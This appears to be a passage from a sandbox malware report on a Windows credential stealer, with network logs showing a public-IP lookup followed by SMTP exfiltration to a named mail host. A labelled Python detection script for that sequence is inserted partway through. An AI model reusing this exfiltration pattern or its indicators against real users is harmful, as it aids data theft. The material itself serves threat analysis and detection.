                                        Feb 2, 2024 14:04:05.167021036 CET | 49707 | 587 | 192.168.2.6 | 89.32.46.159
                                        Feb 2, 2024 14:04:05.175033092 CET | 587 | 49703 | 89.32.46.159 | 192.168.2.6
                                        Feb 2, 2024 14:04:05.397469997 CET | 587 | 49707 | 89.32.46.159 | 192.168.2.6
                                        Feb 2, 2024 14:04:05.397617102 CET | 49707 | 587 | 192.168.2.6 | 89.32.46.159
                                        Feb 2, 2024 14:04:05.445977926 CET | 587 | 49703 | 89.32.46.159 | 192.168.2.6
                                        Feb 2, 2024 14:04:05.446211100 CET | 49703 | 587 | 192.168.2.6 | 89.32.46.159
                                        Feb 2, 2024 14:04:05.630676985 CET | 587 | 49707 | 89.32.46.159 | 192.168.2.6
                                        Feb 2, 2024 14:04:05.631007910 CET | 49707 | 587 | 192.168.2.6 | 89.32.46.159
                                        Feb 2, 2024 14:04:05.680694103 CET | 587 | 49703 | 89.32.46.159 | 192.168.2.6
                                        Feb 2, 2024 14:04:05.680937052 CET | 587 | 49703 | 89.32.46.159 | 192.168.2.6
                                        Feb 2, 2024 14:04:05.681514978 CET | 49703 | 587 | 192.168.2.6 | 89.32.46.159
                                        Feb 2, 2024 14:04:05.681587934 CET | 49703 | 587 | 192.168.2.6 | 89.32.46.159
                                        Feb 2, 2024 14:04:05.681611061 CET | 49703 | 587 | 192.168.2.6 | 89.32.46.159
                                        Feb 2, 2024 14:04:05.681648970 CET | 49703 | 587 | 192.168.2.6 | 89.32.46.159
                                        Feb 2, 2024 14:04:05.869987965 CET | 587 | 49707 | 89.32.46.159 | 192.168.2.6
                                        Feb 2, 2024 14:04:05.870034933 CET | 587 | 49707 | 89.32.46.159 | 192.168.2.6
                                        Feb 2, 2024 14:04:05.870074034 CET | 587 | 49707 | 89.32.46.159 | 192.168.2.6
                                        Feb 2, 2024 14:04:05.870107889 CET | 587 | 49707 | 89.32.46.159 | 192.168.2.6
                                        Feb 2, 2024 14:04:05.870498896 CET | 49707 | 587 | 192.168.2.6 | 89.32.46.159
                                        Feb 2, 2024 14:04:05.872653961 CET | 587 | 49707 | 89.32.46.159 | 192.168.2.6
                                        Feb 2, 2024 14:04:05.874347925 CET | 49707 | 587 | 192.168.2.6 | 89.32.46.159
                                        Feb 2, 2024 14:04:05.916944981 CET | 587 | 49703 | 89.32.46.159 | 192.168.2.6
                                        Feb 2, 2024 14:04:05.916960955 CET | 587 | 49703 | 89.32.46.159 | 192.168.2.6
                                        Feb 2, 2024 14:04:05.916990042 CET | 587 | 49703 | 89.32.46.159 | 192.168.2.6
                                        Feb 2, 2024 14:04:05.917006016 CET | 587 | 49703 | 89.32.46.159 | 192.168.2.6
                                        Feb 2, 2024 14:04:05.920459986 CET | 587 | 49703 | 89.32.46.159 | 192.168.2.6
                                        Feb 2, 2024 14:04:05.966891050 CET | 49703 | 587 | 192.168.2.6 | 89.32.46.159
                                        Feb 2, 2024 14:04:05.976476908 CET | 49703 | 587 | 192.168.2.6 | 89.32.46.159
                                        Feb 2, 2024 14:04:06.105510950 CET | 587 | 49707 | 89.32.46.159 | 192.168.2.6
                                        Feb 2, 2024 14:04:06.114747047 CET | 49707 | 587 | 192.168.2.6 | 89.32.46.159
                                        Feb 2, 2024 14:04:06.214890003 CET | 587 | 49703 | 89.32.46.159 | 192.168.2.6
                                        Feb 2, 2024 14:04:06.215949059 CET | 49703 | 587 | 192.168.2.6 | 89.32.46.159
                                        Feb 2, 2024 14:04:06.217500925 CET | 49708 | 587 | 192.168.2.6 | 89.32.46.159
                                        Feb 2, 2024 14:04:06.345110893 CET | 587 | 49707 | 89.32.46.159 | 192.168.2.6
                                        Feb 2, 2024 14:04:06.345587015 CET | 49707 | 587 | 192.168.2.6 | 89.32.46.159
                                        Feb 2, 2024 14:04:06.451864958 CET | 587 | 49708 | 89.32.46.159 | 192.168.2.6
                                        Feb 2, 2024 14:04:06.452308893 CET | 49708 | 587 | 192.168.2.6 | 89.32.46.159
                                        Feb 2, 2024 14:04:06.578572989 CET | 587 | 49707 | 89.32.46.159 | 192.168.2.6
                                        Feb 2, 2024 14:04:06.582745075 CET | 49707 | 587 | 192.168.2.6 | 89.32.46.159
                                        Feb 2, 2024 14:04:06.695008039 CET | 587 | 49708 | 89.32.46.159 | 192.168.2.6
                                        Feb 2, 2024 14:04:06.695219040 CET | 49708 | 587 | 192.168.2.6 | 89.32.46.159
                                        Feb 2, 2024 14:04:06.815485954 CET | 587 | 49707 | 89.32.46.159 | 192.168.2.6
                                        Feb 2, 2024 14:04:06.815884113 CET | 49707 | 587 | 192.168.2.6 | 89.32.46.159
                                        Feb 2, 2024 14:04:06.929497004 CET | 587 | 49708 | 89.32.46.159 | 192.168.2.6
                                        Feb 2, 2024 14:04:06.929670095 CET | 49708 | 587 | 192.168.2.6 | 89.32.46.159
                                        Feb 2, 2024 14:04:07.049573898 CET | 587 | 49707 | 89.32.46.159 | 192.168.2.6
                                        Feb 2, 2024 14:04:07.049866915 CET | 49707 | 587 | 192.168.2.6 | 89.32.46.159
                                        Feb 2, 2024 14:04:07.165019989 CET | 587 | 49708 | 89.32.46.159 | 192.168.2.6
                                        Feb 2, 2024 14:04:07.165621042 CET | 49708 | 587 | 192.168.2.6 | 89.32.46.159
                                        Feb 2, 2024 14:04:07.292325020 CET | 587 | 49707 | 89.32.46.159 | 192.168.2.6
                                        Feb 2, 2024 14:04:07.292546034 CET | 49707 | 587 | 192.168.2.6 | 89.32.46.159
                                        Feb 2, 2024 14:04:07.406465054 CET | 587 | 49708 | 89.32.46.159 | 192.168.2.6
                                        Feb 2, 2024 14:04:07.406527042 CET | 587 | 49708 | 89.32.46.159 | 192.168.2.6
                                        Feb 2, 2024 14:04:07.406565905 CET | 587 | 49708 | 89.32.46.159 | 192.168.2.6
                                        Feb 2, 2024 14:04:07.406578064 CET | 49708 | 587 | 192.168.2.6 | 89.32.46.159
                                        Feb 2, 2024 14:04:07.406605005 CET | 587 | 49708 | 89.32.46.159 | 192.168.2.6
                                        Feb 2, 2024 14:04:07.406655073 CET | 49708 | 587 | 192.168.2.6 | 89.32.46.159
                                        Feb 2, 2024 14:04:07.409179926 CET | 587 | 49708 | 89.32.46.159 | 192.168.2.6
                                        Feb 2, 2024 14:04:07.410957098 CET | 49708 | 587 | 192.168.2.6 | 89.32.46.159
                                        Feb 2, 2024 14:04:07.524283886 CET | 587 | 49707 | 89.32.46.159 | 192.168.2.6
                                        Feb 2, 2024 14:04:07.525074959 CET | 49707 | 587 | 192.168.2.6 | 89.32.46.159
                                        Feb 2, 2024 14:04:07.525141001 CET | 49707 | 587 | 192.168.2.6 | 89.32.46.159
                                        Feb 2, 2024 14:04:07.525180101 CET | 49707 | 587 | 192.168.2.6 | 89.32.46.159
                                        Feb 2, 2024 14:04:07.525214911 CET | 49707 | 587 | 192.168.2.6 | 89.32.46.159
                                        Feb 2, 2024 14:04:07.646472931 CET | 587 | 49708 | 89.32.46.159 | 192.168.2.6
                                        Feb 2, 2024 14:04:07.647690058 CET | 49708 | 587 | 192.168.2.6 | 89.32.46.159
                                        Feb 2, 2024 14:04:07.755373001 CET | 587 | 49707 | 89.32.46.159 | 192.168.2.6
                                        Feb 2, 2024 14:04:07.755388021 CET | 587 | 49707 | 89.32.46.159 | 192.168.2.6
                                        Feb 2, 2024 14:04:07.755397081 CET | 587 | 49707 | 89.32.46.159 | 192.168.2.6
                                        Feb 2, 2024 14:04:07.755408049 CET | 587 | 49707 | 89.32.46.159 | 192.168.2.6
                                        Feb 2, 2024 14:04:07.757992983 CET | 587 | 49707 | 89.32.46.159 | 192.168.2.6
                                        Feb 2, 2024 14:04:07.805370092 CET | 49707 | 587 | 192.168.2.6 | 89.32.46.159
                                        Feb 2, 2024 14:04:07.884782076 CET | 587 | 49708 | 89.32.46.159 | 192.168.2.6
                                        Feb 2, 2024 14:04:07.885087967 CET | 49708 | 587 | 192.168.2.6 | 89.32.46.159
                                        Feb 2, 2024 14:04:08.037220001 CET | 587 | 49707 | 89.32.46.159 | 192.168.2.6
                                        Feb 2, 2024 14:04:08.039974928 CET | 49707 | 587 | 192.168.2.6 | 89.32.46.159
                                        Feb 2, 2024 14:04:08.039988995 CET | 49709 | 587 | 192.168.2.6 | 89.32.46.159
                                        Feb 2, 2024 14:04:08.119826078 CET | 587 | 49708 | 89.32.46.159 | 192.168.2.6
                                        Feb 2, 2024 14:04:08.120147943 CET | 49708 | 587 | 192.168.2.6 | 89.32.46.159
                                        Feb 2, 2024 14:04:08.274337053 CET | 587 | 49709 | 89.32.46.159 | 192.168.2.6
                                        Feb 2, 2024 14:04:08.275394917 CET | 49709 | 587 | 192.168.2.6 | 89.32.46.159
                                        Feb 2, 2024 14:04:08.356646061 CET | 587 | 49708 | 89.32.46.159 | 192.168.2.6
                                        Feb 2, 2024 14:04:08.359342098 CET | 49708 | 587 | 192.168.2.6 | 89.32.46.159
                                        Feb 2, 2024 14:04:08.511997938 CET | 587 | 49709 | 89.32.46.159 | 192.168.2.6
                                        Feb 2, 2024 14:04:08.512509108 CET | 49709 | 587 | 192.168.2.6 | 89.32.46.159
                                        Feb 2, 2024 14:04:08.594249010 CET | 587 | 49708 | 89.32.46.159 | 192.168.2.6
                                        Feb 2, 2024 14:04:08.594665051 CET | 49708 | 587 | 192.168.2.6 | 89.32.46.159
                                        Feb 2, 2024 14:04:08.745165110 CET | 587 | 49709 | 89.32.46.159 | 192.168.2.6
                                        Feb 2, 2024 14:04:08.745388031 CET | 49709 | 587 | 192.168.2.6 | 89.32.46.159
                                        Feb 2, 2024 14:04:08.838191986 CET | 587 | 49708 | 89.32.46.159 | 192.168.2.6
                                        Feb 2, 2024 14:04:08.838422060 CET | 49708 | 587 | 192.168.2.6 | 89.32.46.159
                                        Feb 2, 2024 14:04:08.979149103 CET | 587 | 49709 | 89.32.46.159 | 192.168.2.6
                                        Feb 2, 2024 14:04:08.979815960 CET | 49709 | 587 | 192.168.2.6 | 89.32.46.159
                                        Feb 2, 2024 14:04:09.072380066 CET | 587 | 49708 | 89.32.46.159 | 192.168.2.6
                                        Feb 2, 2024 14:04:09.074153900 CET | 49708 | 587 | 192.168.2.6 | 89.32.46.159
                                        Feb 2, 2024 14:04:09.074296951 CET | 49708 | 587 | 192.168.2.6 | 89.32.46.159
                                        Feb 2, 2024 14:04:09.074404955 CET | 49708 | 587 | 192.168.2.6 | 89.32.46.159
                                        Feb 2, 2024 14:04:09.074557066 CET | 49708 | 587 | 192.168.2.6 | 89.32.46.159
                                        Feb 2, 2024 14:04:09.074647903 CET | 49708 | 587 | 192.168.2.6 | 89.32.46.159
                                        Feb 2, 2024 14:04:09.074707985 CET | 49708 | 587 | 192.168.2.6 | 89.32.46.159
                                        Feb 2, 2024 14:04:09.074769974 CET | 49708 | 587 | 192.168.2.6 | 89.32.46.159
                                        Feb 2, 2024 14:04:09.074822903 CET | 49708 | 587 | 192.168.2.6 | 89.32.46.159
                                        Feb 2, 2024 14:04:09.074863911 CET | 49708 | 587 | 192.168.2.6 | 89.32.46.159
                                        Feb 2, 2024 14:04:09.074975967 CET | 49708 | 587 | 192.168.2.6 | 89.32.46.159
                                        Feb 2, 2024 14:04:09.218929052 CET | 587 | 49709 | 89.32.46.159 | 192.168.2.6
                                        Feb 2, 2024 14:04:09.218990088 CET | 587 | 49709 | 89.32.46.159 | 192.168.2.6
                                        Feb 2, 2024 14:04:09.219031096 CET | 587 | 49709 | 89.32.46.159 | 192.168.2.6
                                        Feb 2, 2024 14:04:09.219058990 CET | 49709 | 587 | 192.168.2.6 | 89.32.46.159
                                        Feb 2, 2024 14:04:09.219085932 CET | 587 | 49709 | 89.32.46.159 | 192.168.2.6
                                        Feb 2, 2024 14:04:09.219136953 CET | 49709 | 587 | 192.168.2.6 | 89.32.46.159
                                        Feb 2, 2024 14:04:09.221335888 CET | 587 | 49709 | 89.32.46.159 | 192.168.2.6
                                        Feb 2, 2024 14:04:09.224097967 CET | 49709 | 587 | 192.168.2.6 | 89.32.46.159
                                        Feb 2, 2024 14:04:09.308150053 CET | 587 | 49708 | 89.32.46.159 | 192.168.2.6
                                        Feb 2, 2024 14:04:09.308190107 CET | 587 | 49708 | 89.32.46.159 | 192.168.2.6
                                        Feb 2, 2024 14:04:09.308278084 CET | 587 | 49708 | 89.32.46.159 | 192.168.2.6
                                        Feb 2, 2024 14:04:09.308310986 CET | 587 | 49708 | 89.32.46.159 | 192.168.2.6
                                        Feb 2, 2024 14:04:09.308343887 CET | 587 | 49708 | 89.32.46.159 | 192.168.2.6
                                        Feb 2, 2024 14:04:09.308376074 CET | 587 | 49708 | 89.32.46.159 | 192.168.2.6
                                        Feb 2, 2024 14:04:09.308408022 CET | 587 | 49708 | 89.32.46.159 | 192.168.2.6
                                        Feb 2, 2024 14:04:09.308439970 CET | 587 | 49708 | 89.32.46.159 | 192.168.2.6
                                        Feb 2, 2024 14:04:09.308626890 CET | 587 | 49708 | 89.32.46.159 | 192.168.2.6
                                        Feb 2, 2024 14:04:09.308942080 CET | 587 | 49708 | 89.32.46.159 | 192.168.2.6
                                        Feb 2, 2024 14:04:09.312289000 CET5874970889.32.46.159192.168.2.6
                                        Feb 2, 2024 14:04:09.356471062 CET49708587192.168.2.689.32.46.159
                                        Feb 2, 2024 14:04:09.456953049 CET5874970989.32.46.159192.168.2.6
                                        Feb 2, 2024 14:04:09.497320890 CET49709587192.168.2.689.32.46.159
                                        Feb 2, 2024 14:04:09.512399912 CET49709587192.168.2.689.32.46.159
                                        Feb 2, 2024 14:04:09.745264053 CET5874970989.32.46.159192.168.2.6
                                        Feb 2, 2024 14:04:09.745798111 CET49709587192.168.2.689.32.46.159
                                        Feb 2, 2024 14:04:09.979006052 CET5874970989.32.46.159192.168.2.6
                                        Feb 2, 2024 14:04:09.981270075 CET49709587192.168.2.689.32.46.159
                                        Feb 2, 2024 14:04:10.216989994 CET5874970989.32.46.159192.168.2.6
                                        Feb 2, 2024 14:04:10.217293024 CET49709587192.168.2.689.32.46.159
                                        Feb 2, 2024 14:04:10.449932098 CET5874970989.32.46.159192.168.2.6
                                        Feb 2, 2024 14:04:10.450521946 CET49709587192.168.2.689.32.46.159
                                        Feb 2, 2024 14:04:10.691304922 CET5874970989.32.46.159192.168.2.6
                                        Feb 2, 2024 14:04:10.691597939 CET49709587192.168.2.689.32.46.159
                                        Feb 2, 2024 14:04:10.924274921 CET5874970989.32.46.159192.168.2.6
                                        Feb 2, 2024 14:04:10.925040007 CET49709587192.168.2.689.32.46.159
                                        Feb 2, 2024 14:04:10.925144911 CET49709587192.168.2.689.32.46.159
                                        Feb 2, 2024 14:04:10.925216913 CET49709587192.168.2.689.32.46.159
                                        Feb 2, 2024 14:04:10.925293922 CET49709587192.168.2.689.32.46.159
                                        Feb 2, 2024 14:04:10.925376892 CET49709587192.168.2.689.32.46.159
                                        Feb 2, 2024 14:04:10.925451040 CET49709587192.168.2.689.32.46.159
                                        Feb 2, 2024 14:04:10.925524950 CET49709587192.168.2.689.32.46.159
                                        Feb 2, 2024 14:04:10.925586939 CET49709587192.168.2.689.32.46.159
                                        Feb 2, 2024 14:04:10.925642014 CET49709587192.168.2.689.32.46.159
                                        Feb 2, 2024 14:04:10.925703049 CET49709587192.168.2.689.32.46.159
                                        Feb 2, 2024 14:04:11.157469988 CET5874970989.32.46.159192.168.2.6
                                        Feb 2, 2024 14:04:11.157514095 CET5874970989.32.46.159192.168.2.6
                                        Feb 2, 2024 14:04:11.157546997 CET5874970989.32.46.159192.168.2.6
                                        Feb 2, 2024 14:04:11.157578945 CET5874970989.32.46.159192.168.2.6
                                        Feb 2, 2024 14:04:11.157609940 CET5874970989.32.46.159192.168.2.6
                                        Feb 2, 2024 14:04:11.157641888 CET5874970989.32.46.159192.168.2.6
                                        Feb 2, 2024 14:04:11.157690048 CET5874970989.32.46.159192.168.2.6
                                        Feb 2, 2024 14:04:11.157721043 CET5874970989.32.46.159192.168.2.6
                                        Feb 2, 2024 14:04:11.157753944 CET5874970989.32.46.159192.168.2.6
                                        Feb 2, 2024 14:04:11.158523083 CET5874970989.32.46.159192.168.2.6
                                        Feb 2, 2024 14:04:11.161515951 CET5874970989.32.46.159192.168.2.6
                                        Feb 2, 2024 14:04:11.215883017 CET49709587192.168.2.689.32.46.159
                                        Feb 2, 2024 14:05:41.872473001 CET49708587192.168.2.689.32.46.159
                                        Feb 2, 2024 14:05:42.107810974 CET5874970889.32.46.159192.168.2.6
                                        Feb 2, 2024 14:05:42.109292030 CET49708587192.168.2.689.32.46.159
                                        Feb 2, 2024 14:05:44.716171980 CET49709587192.168.2.689.32.46.159
                                        Feb 2, 2024 14:05:44.949645996 CET5874970989.32.46.159192.168.2.6
                                        Feb 2, 2024 14:05:44.950527906 CET49709587192.168.2.689.32.46.159
UDP packets
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Feb 2, 2024 14:04:00.208085060 CET | 49941 | 53 | 192.168.2.6 | 1.1.1.1
Feb 2, 2024 14:04:00.325644970 CET | 53 | 49941 | 1.1.1.1 | 192.168.2.6
Feb 2, 2024 14:04:01.848052979 CET | 57419 | 53 | 192.168.2.6 | 1.1.1.1
Feb 2, 2024 14:04:02.469059944 CET | 53 | 57419 | 1.1.1.1 | 192.168.2.6
DNS queries
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Feb 2, 2024 14:04:00.208085060 CET | 192.168.2.6 | 1.1.1.1 | 0xac4b | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false
Feb 2, 2024 14:04:01.848052979 CET | 192.168.2.6 | 1.1.1.1 | 0x96c0 | Standard query (0) | mail.triorentacar.ro | A (IP address) | IN (0x0001) | false
DNS answers
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Feb 2, 2024 14:04:00.325644970 CET | 1.1.1.1 | 192.168.2.6 | 0xac4b | No error (0) | api.ipify.org | api4.ipify.org | - | CNAME (Canonical name) | IN (0x0001) | false
Feb 2, 2024 14:04:00.325644970 CET | 1.1.1.1 | 192.168.2.6 | 0xac4b | No error (0) | api4.ipify.org | - | 173.231.16.76 | A (IP address) | IN (0x0001) | false
Feb 2, 2024 14:04:00.325644970 CET | 1.1.1.1 | 192.168.2.6 | 0xac4b | No error (0) | api4.ipify.org | - | 104.237.62.212 | A (IP address) | IN (0x0001) | false
Feb 2, 2024 14:04:00.325644970 CET | 1.1.1.1 | 192.168.2.6 | 0xac4b | No error (0) | api4.ipify.org | - | 64.185.227.156 | A (IP address) | IN (0x0001) | false
Feb 2, 2024 14:04:02.469059944 CET | 1.1.1.1 | 192.168.2.6 | 0x96c0 | No error (0) | mail.triorentacar.ro | triorentacar.ro | - | CNAME (Canonical name) | IN (0x0001) | false
Feb 2, 2024 14:04:02.469059944 CET | 1.1.1.1 | 192.168.2.6 | 0x96c0 | No error (0) | triorentacar.ro | - | 89.32.46.159 | A (IP address) | IN (0x0001) | false
                                        • api.ipify.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49702 | 173.231.16.76 | 443 | 1460 | C:\Users\user\Desktop\nOrden_de_compra.exe
Timestamp | Bytes transferred | Direction | Data
2024-02-02 13:04:01 UTC | 155 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
    Host: api.ipify.org
    Connection: Keep-Alive
2024-02-02 13:04:01 UTC | 157 | IN | HTTP/1.1 200 OK
    Server: nginx/1.25.1
    Date: Fri, 02 Feb 2024 13:04:01 GMT
    Content-Type: text/plain
    Content-Length: 12
    Connection: close
    Vary: Origin
2024-02-02 13:04:01 UTC | 12 | IN | Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 37 34
    Data Ascii: 81.181.57.74


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 49706 | 173.231.16.76 | 443 | 1176 | C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe
Timestamp | Bytes transferred | Direction | Data
2024-02-02 13:04:03 UTC | 155 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
    Host: api.ipify.org
    Connection: Keep-Alive
2024-02-02 13:04:04 UTC | 157 | IN | HTTP/1.1 200 OK
    Server: nginx/1.25.1
    Date: Fri, 02 Feb 2024 13:04:04 GMT
    Content-Type: text/plain
    Content-Length: 12
    Connection: close
    Vary: Origin
2024-02-02 13:04:04 UTC | 12 | IN | Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 37 34
    Data Ascii: 81.181.57.74


SMTP packets
Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
Feb 2, 2024 14:04:02.956008911 CET | 587 | 49703 | 89.32.46.159 | 192.168.2.6 | 220-triorentacar.triorentacar.ro ESMTP Exim 4.96.2 #2 Fri, 02 Feb 2024 15:04:01 +0200
    220-We do not authorize the use of this system to transport unsolicited,
    220 and/or bulk e-mail.
Feb 2, 2024 14:04:02.956404924 CET | 49703 | 587 | 192.168.2.6 | 89.32.46.159 | EHLO 210979
Feb 2, 2024 14:04:03.190959930 CET | 587 | 49703 | 89.32.46.159 | 192.168.2.6 | 250-triorentacar.triorentacar.ro Hello 210979 [81.181.57.74]
    250-SIZE 52428800
    250-8BITMIME
    250-PIPELINING
    250-PIPECONNECT
    250-STARTTLS
    250 HELP
Feb 2, 2024 14:04:03.193321943 CET | 49703 | 587 | 192.168.2.6 | 89.32.46.159 | STARTTLS
Feb 2, 2024 14:04:03.429385900 CET | 587 | 49703 | 89.32.46.159 | 192.168.2.6 | 220 TLS go ahead
Feb 2, 2024 14:04:05.166806936 CET | 587 | 49707 | 89.32.46.159 | 192.168.2.6 | 220-triorentacar.triorentacar.ro ESMTP Exim 4.96.2 #2 Fri, 02 Feb 2024 15:04:04 +0200
    220-We do not authorize the use of this system to transport unsolicited,
    220 and/or bulk e-mail.
Feb 2, 2024 14:04:05.167021036 CET | 49707 | 587 | 192.168.2.6 | 89.32.46.159 | EHLO 210979
Feb 2, 2024 14:04:05.397469997 CET | 587 | 49707 | 89.32.46.159 | 192.168.2.6 | 250-triorentacar.triorentacar.ro Hello 210979 [81.181.57.74]
    250-SIZE 52428800
    250-8BITMIME
    250-PIPELINING
    250-PIPECONNECT
    250-STARTTLS
    250 HELP
Feb 2, 2024 14:04:05.397617102 CET | 49707 | 587 | 192.168.2.6 | 89.32.46.159 | STARTTLS
Feb 2, 2024 14:04:05.630676985 CET | 587 | 49707 | 89.32.46.159 | 192.168.2.6 | 220 TLS go ahead
Feb 2, 2024 14:04:06.695008039 CET | 587 | 49708 | 89.32.46.159 | 192.168.2.6 | 220-triorentacar.triorentacar.ro ESMTP Exim 4.96.2 #2 Fri, 02 Feb 2024 15:04:05 +0200
    220-We do not authorize the use of this system to transport unsolicited,
    220 and/or bulk e-mail.
Feb 2, 2024 14:04:06.695219040 CET | 49708 | 587 | 192.168.2.6 | 89.32.46.159 | EHLO 210979
Feb 2, 2024 14:04:06.929497004 CET | 587 | 49708 | 89.32.46.159 | 192.168.2.6 | 250-triorentacar.triorentacar.ro Hello 210979 [81.181.57.74]
    250-SIZE 52428800
    250-8BITMIME
    250-PIPELINING
    250-PIPECONNECT
    250-STARTTLS
    250 HELP
Feb 2, 2024 14:04:06.929670095 CET | 49708 | 587 | 192.168.2.6 | 89.32.46.159 | STARTTLS
Feb 2, 2024 14:04:07.165019989 CET | 587 | 49708 | 89.32.46.159 | 192.168.2.6 | 220 TLS go ahead
Feb 2, 2024 14:04:08.511997938 CET | 587 | 49709 | 89.32.46.159 | 192.168.2.6 | 220-triorentacar.triorentacar.ro ESMTP Exim 4.96.2 #2 Fri, 02 Feb 2024 15:04:07 +0200
    220-We do not authorize the use of this system to transport unsolicited,
    220 and/or bulk e-mail.
Feb 2, 2024 14:04:08.512509108 CET | 49709 | 587 | 192.168.2.6 | 89.32.46.159 | EHLO 210979
Feb 2, 2024 14:04:08.745165110 CET | 587 | 49709 | 89.32.46.159 | 192.168.2.6 | 250-triorentacar.triorentacar.ro Hello 210979 [81.181.57.74]
    250-SIZE 52428800
    250-8BITMIME
    250-PIPELINING
    250-PIPECONNECT
    250-STARTTLS
    250 HELP
Feb 2, 2024 14:04:08.745388031 CET | 49709 | 587 | 192.168.2.6 | 89.32.46.159 | STARTTLS
Feb 2, 2024 14:04:08.979149103 CET | 587 | 49709 | 89.32.46.159 | 192.168.2.6 | 220 TLS go ahead
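All four SMTP handshakes above go to the address that mail.triorentacar.ro resolved to, and each follows the sample's public-IP lookup against api.ipify.org by a few seconds; after STARTTLS the message body is not visible, so the lookup-then-submit sequence is what a network detection has to key on. The Python below is an added example, not Joe Sandbox code, that correlates flow records into that sequence. The flows and DNS answers are constructed from the values in this report (CET timestamps converted to UTC, ports and addresses as listed); the 30-second window and the set of submission ports are assumptions.

```python
"""Correlate flow records into the AgentTesla exfiltration sequence seen in
this report: a public-IP lookup (api.ipify.org) followed by an SMTP
submission to the operator's mailbox host.

Added example, not Joe Sandbox code. FLOWS and DNS are constructed from the
values visible in the report; the 30 s window is an assumption."""
from dataclasses import dataclass
from datetime import datetime, timedelta


@dataclass(frozen=True)
class Flow:
    ts: datetime          # first packet of the connection, UTC
    src_ip: str
    src_port: int
    dst_ip: str
    dst_port: int
    process: str = ""     # image path, when the sandbox attributes the flow


@dataclass(frozen=True)
class Hit:
    lookup: Flow          # the IP-lookup connection that preceded the send
    smtp: Flow            # the mail-submission connection
    mail_host: str        # name that resolved to smtp.dst_ip, "" if unknown


# DNS answers from the report, CNAME chains flattened to final addresses.
DNS = {
    "api.ipify.org": {"173.231.16.76", "104.237.62.212", "64.185.227.156"},
    "mail.triorentacar.ro": {"89.32.46.159"},
}
IP_LOOKUP_SERVICES = {"api.ipify.org"}   # extend with other "what is my IP" hosts
SUBMISSION_PORTS = {25, 465, 587}       # assumption: ports treated as mail submission

SANDBOX = "192.168.2.6"


def _t(hms: str) -> datetime:
    """Report timestamps are CET (UTC+1); these are already converted to UTC."""
    return datetime.fromisoformat(f"2024-02-02T{hms}")


# Constructed from the HTTP sessions and SMTP handshakes in the report.
FLOWS = [
    Flow(_t("13:04:01"), SANDBOX, 49702, "173.231.16.76", 443,
         r"C:\Users\user\Desktop\nOrden_de_compra.exe"),
    Flow(_t("13:04:02"), SANDBOX, 49703, "89.32.46.159", 587),
    Flow(_t("13:04:03"), SANDBOX, 49706, "173.231.16.76", 443,
         r"C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe"),
    Flow(_t("13:04:05"), SANDBOX, 49707, "89.32.46.159", 587),
    Flow(_t("13:04:06"), SANDBOX, 49708, "89.32.46.159", 587),
    Flow(_t("13:04:08"), SANDBOX, 49709, "89.32.46.159", 587),
]


def reverse_dns(dns):
    """ip -> name, built from the observed answers (not a live PTR lookup)."""
    return {ip: name for name, ips in dns.items() for ip in ips}


def detect_exfil_sequence(flows, dns, window=timedelta(seconds=30)):
    """For every connection to a submission port, find the most recent earlier
    connection from the same source to a public-IP lookup service within
    `window`. Each SMTP flow yields at most one Hit."""
    rdns = reverse_dns(dns)
    ordered = sorted(flows, key=lambda f: f.ts)
    hits = []
    for i, smtp in enumerate(ordered):
        if smtp.dst_port not in SUBMISSION_PORTS:
            continue
        for prev in reversed(ordered[:i]):          # walk back in time
            if smtp.ts - prev.ts > window:
                break
            if prev.src_ip == smtp.src_ip and rdns.get(prev.dst_ip) in IP_LOOKUP_SERVICES:
                hits.append(Hit(prev, smtp, rdns.get(smtp.dst_ip, "")))
                break
    return hits


def mail_hosts(hits):
    """Distinct exfiltration mail hosts named in the hits."""
    return {h.mail_host for h in hits}


if __name__ == "__main__":
    for h in detect_exfil_sequence(FLOWS, DNS):
        print(f"{h.smtp.ts:%H:%M:%S}Z {h.smtp.src_ip}:{h.smtp.src_port} -> "
              f"{h.mail_host or h.smtp.dst_ip}:{h.smtp.dst_port} "
              f"after IP lookup by {h.lookup.process or '?'}")
```

Each SMTP connection is paired with the most recent preceding lookup from the same source, so the first hit is attributed to nOrden_de_compra.exe and the later three to the lookup made by the dropped nNdsLvHyWi.exe. The report does not attribute the SMTP flows themselves to a process, so that pairing is a heuristic for triage, not proof of which image sent which message.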

                                        Target ID:0
                                        Start time:14:03:56
                                        Start date:02/02/2024
                                        Path:C:\Users\user\Desktop\nOrden_de_compra.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Users\user\Desktop\nOrden_de_compra.exe
                                        Imagebase:0x8d0000
                                        File size:730'624 bytes
                                        MD5 hash:593BB72286C1C2CE5C2456C7D9585A80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2116574097.00000000071A0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2116474951.0000000007160000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2114084999.0000000003CA8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2113140924.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
